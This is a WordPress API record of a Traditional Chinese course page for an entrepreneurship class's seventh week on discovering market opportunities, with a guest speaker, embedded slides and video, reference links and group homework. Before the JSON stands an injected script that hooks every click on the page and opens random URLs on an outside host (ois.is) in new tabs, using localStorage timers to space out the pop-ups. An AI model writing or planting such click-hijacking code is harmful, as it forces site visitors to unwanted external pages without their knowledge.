<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":875,"date":"2014-10-11T11:36:36","date_gmt":"2014-10-11T03:36:36","guid":{"rendered":"http:\/\/edu.secda.info\/phil999_course02\/?page_id=875"},"modified":"2020-02-20T18:12:15","modified_gmt":"2020-02-20T10:12:15","slug":"%e7%ab%a0%e7%af%801-6","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/phil999_course02\/?page_id=875","title":{"rendered":"\u7b2c\u4e03\u9031 \u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703(\u4e09)(\u675c\u7e3d)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"875\" class=\"elementor elementor-875\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3383 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3383\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5e3c\" data-id=\"5e3c\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1783 elementor-widget elementor-widget-text-editor\" data-id=\"1783\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\r\n\t\t\t\t\u02d9\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-37cb752 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"37cb752\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c522ab7\" data-id=\"c522ab7\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-aac690b elementor-widget elementor-widget-heading\" data-id=\"aac690b\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u524d\u6e96\u5099<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-0f5f625 elementor-widget elementor-widget-accordion\" data-id=\"0f5f625\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-1611\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-1611\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u9810\u7fd2<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-1611\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-1611\"><p><span style=\"color: #000000;\">\u6f14\u8b1b\u8005\uff1a\u675c\u4e16\u6587\u7e3d\u7d93\u7406\u3002\u6f14\u8b1b\u4e3b\u984c :\u901a\u8def\u578b\u4e92\u806f\u7db2\u5275\u696d\u3002<br \/><\/span><br \/><span style=\"color: #000000;\">\u6bcf\u7d44\u5230\u53f0\u4e0a\u5206\u4eab\u6700\u65b0\u9032\u5ea6<\/span><\/p><p>\u00a0<\/p><p>[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/duzong-0402.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-72ed358 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"72ed358\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f18b634\" data-id=\"f18b634\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f2a396e elementor-widget elementor-widget-heading\" data-id=\"f2a396e\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u4e0a\u8ab2\u7d00\u9304<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-dc1e39b elementor-widget elementor-widget-toggle\" data-id=\"dc1e39b\" data-element_type=\"widget\" data-widget_type=\"toggle.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-toggle\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2301\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2301\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u8ab2\u5802\u5f71\u7247<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2301\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2301\"><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/sIGggQlmHFo\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2302\" class=\"elementor-tab-title\" data-tab=\"2\" role=\"tab\" aria-controls=\"elementor-tab-content-2302\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u521d\u6b65\u5b8c\u6210\"2.\u65b0\u5546\u696d\u6a21\u5f0f\u767c\u5c55\"<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2302\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"2\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2302\">[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/step2-_V1_20181022.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;850px&#8221; style=&#8221;border:0;&#8221;]<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2303\" class=\"elementor-tab-title\" data-tab=\"3\" role=\"tab\" aria-controls=\"elementor-tab-content-2303\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">XMIND\u7bc4\u672c\u4f7f\u7528\u6d41\u7a0b\u5716<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2303\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"3\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2303\">[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/xmindSOP.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;850px&#8221; style=&#8221;border:0;&#8221;]<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2304\" class=\"elementor-tab-title\" data-tab=\"4\" role=\"tab\" aria-controls=\"elementor-tab-content-2304\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u53c3\u8003\u8cc7\u6599<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2304\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"4\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2304\"><p>&nbsp;<\/p><ul><li><span style=\"font-size: 14pt;\"><strong><span style=\"color: #333399;\">\u5b78\u9577\u59d0\u500b\u4eba\u5e73\u53f0\u5c55\u793a<\/span> <\/strong>:\u00a0<a href=\"http:\/\/si.secda.info\/usc_fashiongroup107\/\">http:\/\/si.secda.info\/usc_fashiongroup107\/<\/a><\/span><\/li><\/ul><ul><li><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">\u5c55\u793a\u500b\u4eba\u54c1\u724c\u5e73\u53f0\uff1a<\/span><\/strong><\/span><\/li><\/ul><p><span style=\"font-size: 14pt;\"><span style=\"color: #000000;\">\u7a0b\u96e8\u840d \u5be6\u8e10\u5927\u5b78\u5275\u610f\u535a\u58eb\u73ed \/\u517c\u4efb\u8b1b\u5e2b<\/span> <a href=\"http:\/\/si.secda.info\/thiah\">http:\/\/si.secda.info\/thiah<\/a><\/span><\/p><p><span style=\"font-size: 14pt;\"><span style=\"color: #000000;\">\u856d\u61b6\u74a0 \u821e\u8e48\/\u5065\u8eab\u8001\u5e2b<\/span>\u00a0<\/span><span style=\"font-size: 14pt;\"><a href=\"http:\/\/si.secda.info\/yifan\">http:\/\/si.secda.info\/yifan<\/a><\/span><\/p><p><span style=\"font-size: 14pt;\"><span style=\"color: #000000;\">\u5f6d\u8389\u5a77 \u73e0\u5bf6\u8a2d\u8a08\u5e2b\/\u73e0\u5bf6\u6b77\u53f2\u7814\u7a76\u5b78\u5bb6<\/span>\u00a0<\/span><span style=\"font-size: 14pt;\"><a href=\"http:\/\/si.secda.info\/junopeng\">http:\/\/si.secda.info\/junopeng<\/a><\/span><\/p><ul><li><strong><span style=\"font-size: 14pt; color: #333399;\">\u672c\u8ab2\u7a0b\u5e73\u53f0 : \u7d00\u9304\u8ab2\u5802\u5b78\u7fd2\u5167\u5bb9\u8207\u9032\u5ea6<\/span><\/strong><\/li><\/ul><p><a href=\"http:\/\/si.secda.info\/usc_innomgmt1072\"><span style=\"font-size: 14pt;\">http:\/\/si.secda.info\/usc_innomgmt1072<\/span><\/a><\/p><ul><li><strong><span style=\"font-size: 14pt; color: #333399;\">\u5275\u696d\u52df\u8cc7\u5e73\u53f0 : \u671f\u672b\u5831\u544a\u6210\u679c\u5c55\u793a\u8207\u5c0b\u627e\u6295\u8cc7\u6a5f\u6703<\/span><\/strong><\/li><\/ul><p><span style=\"font-size: 14pt;\"><a href=\"http:\/\/si.secda.info\/intern_program\/\">http:\/\/si.secda.info\/intern_program\/<\/a><\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3869a81 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3869a81\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6e65f3c\" data-id=\"6e65f3c\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-625f726 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"625f726\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2ca93c4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2ca93c4\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ea89115\" data-id=\"ea89115\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-82e7668 elementor-widget elementor-widget-heading\" data-id=\"82e7668\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u5f8c\u5b78\u7fd2\u5831\u544a<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-317e30b elementor-widget elementor-widget-accordion\" data-id=\"317e30b\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-5181\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-5181\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-5181\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-5181\"><p><span style=\"color: #000000;\">4\u67088\u65e5(\u9031\u4e00)\u665a\u4e0a12\u9ede\u524d\uff0c\u4e0a\u50b3\u5718\u968a\u4f5c\u696d\u5b8c\u6210\u4e8b\u9805 :<br \/><\/span><span style=\"color: #000000;\">1. \u627e\u51fa\u76ee\u6a19\u5ba2\u7fa4\uff0c(\u5c31\u662f\u9700\u8981\u670d\u52d9\u7684\u5c0d\u8c61\u662f\u8ab0\uff1f\u4ed6\u53ef\u80fd\u662f\u5408\u4f5c\u5925\u4f34\uff0c\u53ef\u80fd\u662f\u9867\u5ba2\uff0c\u76ee\u6a19\u65cf\u7fa4\u8d8a\u660e\u78ba\u8d8a\u597d\u3002)<br \/>2. \u7ad9\u5728\u76ee\u6a19\u65cf\u7fa4\u7684\u89d2\u5ea6\u601d\u8003\uff0c\u4ed6\u5011\u7684\u9700\u6c42\u53ca\u75db\u9ede\u3002(\u7ad9\u5728\u4f7f\u7528\u8005\u60c5\u5883\u601d\u8003)<br \/>\u8acb\u8a18\u5f97\u5132\u5b58\u6b63\u78ba\u6a94\u540d\u3002<br \/>\u5584\u7528xmind\u8272\u5f69\u3001\u6587\u5b57\u8a2d\u5b9a\u7b49\u7ba1\u7406\u529f\u80fd\u3002<br \/><\/span><\/p><p><span style=\"color: #000000;\">\u500b\u4eba\u5fc3\u5f97\u6587\u7ae0:<br \/>\u671f\u4e2d\u8003\u7576\u5929\u5b8c\u6210\u500b\u4eba\u4f5c\u696d<br \/>1. \u500b\u4eba\u54c1\u724c\u53ca\u5fc3\u667a\u5716\u5b78\u7fd2(2\/26~3\/12)<br \/>2. \u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703(3\/19~4\/2)<\/span><\/p><p><span style=\"color: #000000;\">\u4e0b\u5468\u6bcf\u7d44\u81ea\u5e36\u7b46\u96fb\u3002\u672a\u5e36\u7b46\u96fb\u4e4b\u7d44\u54e1\uff0c\u5c07\u5c0d\u8a72\u7d44\u6bcf\u4f4d\u6210\u54e1\u7e3d\u6210\u7e3e\u5404\u62633\u5206\u3002<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u02d9 \u8ab2\u524d\u6e96\u5099 \u9810\u7fd2 \u6f14\u8b1b\u8005\uff1a\u675c\u4e16\u6587\u7e3d\u7d93\u7406\u3002\u6f14\u8b1b\u4e3b\u984c :\u901a\u8def\u578b\u4e92\u806f\u7db2\u5275\u696d\u3002 \u6bcf\u7d44\u5230<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":853,"menu_order":7,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/875"}],"collection":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=875"}],"version-history":[{"count":5,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/875\/revisions"}],"predecessor-version":[{"id":1541,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/875\/revisions\/1541"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/853"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=875"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}